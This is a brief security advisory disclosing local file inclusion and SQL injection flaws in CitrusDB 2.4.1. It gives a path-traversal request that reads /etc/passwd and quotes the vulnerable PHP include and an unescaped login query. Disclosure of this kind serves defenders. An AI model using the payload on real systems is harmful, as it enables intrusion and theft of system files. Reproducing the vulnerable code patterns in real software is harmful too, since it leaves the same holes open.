CitrusDB 2.4.1 Local File Inclusion / SQL Injection

2012.04.12

Credit: Michal `wacky` Blaszczak

Risk: Medium

Local: No

Remote: Yes

CVE: N/A

CWE: CWE-89
CWE-98

CitrusDB 2.4.1 - LFI/SQLi Vulnerability
Author: Michal `wacky` Blaszczak
WWW: blaszczakm.blogspot.com
CitrusDB is an open source customer service and billing database.
It can be used by customer service personnel to provide sales and support to customers,
and by billing staff to bill customers for their services via invoices and credit card batches.
Customers may access the Online customer account manager to view their services, billing history,
and make service and support requests online.
1) LFI
http://192.168.51.8/lab/citrus-2.4.1/index.php?load=../../../../../etc/passwd%00&type=base
index.php:315
$filepath = "$path_to_citrus/$load.php";
if (file_exists($filepath)) {
include('./'.$load.'.php');
2) SQL INJECTION
include/user.class.php:134
$sql="SELECT password FROM user WHERE username='$user_name' LIMIT 1";

References:

http://blaszczakm.blogspot.com/

See this note in RAW Version

Vote for this issue:

50%

Thanks for you vote!

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.

Nick (*)

Email (*)

Video

Text (*)

(*) - required fields.

{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1

{{ x.comment }}

CitrusDB 2.4.1 Local File Inclusion / SQL Injection

References:

Thanks for you vote!

Thanks for you comment!Your message is in quarantine 48 hours.

Thanks for you comment!
Your message is in quarantine 48 hours.